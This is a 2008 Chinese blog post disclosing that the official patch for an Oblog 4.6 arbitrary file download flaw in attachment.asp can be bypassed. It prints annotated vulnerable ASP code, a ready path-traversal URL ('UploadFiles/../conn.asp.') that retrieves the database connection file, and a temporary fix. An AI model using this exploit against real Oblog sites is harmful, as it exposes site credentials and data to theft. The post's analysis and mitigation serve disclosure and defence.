[五一礼物] 真的补了吗 Oblog漏洞重现- 洋葱圈

Home

[五一礼物] 真的补了吗 Oblog漏洞重现

作者：洋葱圈
周四, 01 5月 2008 22:11
Tags: 瞬间礼物大家出来郁闷作者：Tr4c3 本来这个礼物只是给BK瞬间群的朋友们共享了，特意说不让拿去搞官方，不幸的是还是有人首先拿官方测试，让人很郁闷，T了该人，拉黑。今天放出来给大家。 ######################################################################## Tr4c3[at]126[dot]com 写于[2008-4-29] 版权所有: http://www.nspcn.org/ http://www.tr4c3.com/ Bk瞬间 [QQ群] & Hi [QQ群] ######################################################################## 程序下载：http://down.oblog.cn/oblog4/oblog46_Final_20080403.rar ######################################################################## 描述：愚人节那天雕牌在blog上公布了一个Oblog任意文件下载漏洞。文章见http://www.tr4c3.com/post/302.html <0day>愚人节的礼物 oblog文件下载漏洞。随后官方发布的Oblog版本里对代码做了些许改动，并发布了相关补丁。详见：http://bbs.oblog.cn/dispbbs.asp?boardid=119&Id=132375 [oblog46体验版_patch_20080403补丁] http://www.target.com/attachment.asp?path=./conn.asp这样已经无法下载文件，我从官方下载了最新版本4.60 Final Build080403 Access(集成了attachment.asp补丁)，发现修改后的代码并不能解决问题,OBlog任意文件下载漏洞依然存在。具体看 attachment.asp代码。 ######################################################################## 关键部分： Path = Trim(Request("path")) '获取用户提交的路径 FileID = Trim(Request("FileID")) If FileID ="" And Path = "" Then Response.Write "参数不足" Response.End End If ... If CheckDownLoad Or 1= 1Then If Path = "" Then set rs = Server.CreateObject("ADODB.RecordSet") link_database SQL = ("select file_path,userid,file_ext,ViewNum FROM oblog_upfile WHERE FileID = "&CLng(FileID)) rs.open sql,conn,1,3 If Not rs.Eof Then uid = rs(1) file_ext = rs(2) rs("ViewNum") = rs("ViewNum") + 1 rs.Update downloadFile Server.MapPath(rs(0)),0 Else Response.Status=404 Response.Write "该附件不存在!" End If rs.Close Set rs = Nothing Else If InStr(path,Oblog.CacheConfig(56)) > 0 Then 'Tr4c3 标注：注意这里，仅仅判断用户提交的路径是否包含UploadFiles，为真则调用downloadfile函数下载文件 downloadFile Server.MapPath(Path),1 End if End If Else '如果附件为图片的话，当权限检验无法通过则调用一默认图片，防止<img>标记无法调用，影响显示效果 If Path = "" Then Response.Status=403 Response.Write ShowDownErr Response.End Else downloadFile Server.MapPath(blogdir&"images/oblog_powered.gif"),1 End if End if Set oblog = Nothing Sub downloadFile(strFile,stype) On Error Resume Next Server.ScriptTimeOut=9999999 Dim S,fso,f,intFilelength,strFilename strFilename = strFile Response.Clear Set s = Server.CreateObject(oblog.CacheCompont(2)) s.Open s.Type = 1 Set fso = Server.CreateObject(oblog.CacheCompont(1)) If Not fso.FileExists(strFilename) Then If stype = 0 Then Response.Status=404 Response.Write "该附件已经被删除!" Exit Sub Else strFilename = Server.MapPath(blogdir&"images/nopic.gif") End if End If Set f = fso.GetFile(strFilename) intFilelength = f.size s.LoadFromFile(strFilename) If Err Then Response.Write("<h1>错误: </h1>" & Err.Description & "<p>") Response.End End If Set fso=Nothing Dim Data Data=s.Read s.Close Set s=Nothing Dim ContentType select Case LCase(Right(strFile, 4)) Case ".asp",".mdb",".config",".js" 'Tr4c3 标注：再看这里，想起来什么来了？对了，前几天我发的沸腾展望新闻系统的任意下载漏洞跟这个检查的方法差不多[http://www.tr4c3.com /post/306.html]，利用方法也相似，神奇的"."又派上用场了。 Exit Sub Case ".asf" ContentType = "video/x-ms-asf" Case ".avi" ContentType = "video/avi" Case ".doc" ContentType = "application/msword" Case ".zip" ContentType = "application/zip" Case ".xls" ContentType = "application/vnd.ms-excel" Case ".gif" ContentType = "image/gif" Case ".jpg", "jpeg" ContentType = "image/jpeg" Case ".wav" ContentType = "audio/wav" Case ".mp3" ContentType = "audio/mpeg3" Case ".mpg", "mpeg" ContentType = "video/mpeg" Case ".rtf" ContentType = "application/rtf" Case ".htm", "html" ContentType = "text/html" Case ".txt" ContentType = "text/plain" Case Else ContentType = "application/octet-stream" End select If Response.IsClientConnected Then If Not (InStr(LCase(f.name),".gif")>0 Or InStr(LCase(f.name),".jpg")>0 Or InStr(LCase(f.name),".jpeg")>0 Or InStr(LCase(f.name),".bmp")>0 Or InStr(LCase(f.name),".png")>0 )Then Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name End If Response.AddHeader "Content-Length", intFilelength Response.CharSet = "UTF-8" Response.ContentType = ContentType Response.BinaryWrite Data Response.Flush Response.Clear() End If End Sub ######################################################################## 利用方法： http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp. ######################################################################## 修补建议：等待官方发布新的补丁程序。 ######################################################################## 临时解决办法：将attachment.asp第5行 Path = Trim(Request(”path”)) 改成 Path = Replace(Trim(Request(”path”)),”..”,”") ############################################### Set as favorite Bookmark Email This Hits: 422 Trackback(0) TrackBack URI for this entry Comments (0) Subscribe to this comment's feed Show/Hide comments Write comment Show/Hide comment form Email Website Comment smaller \| bigger Subscribe via email (Registered users only) Write the displayed characters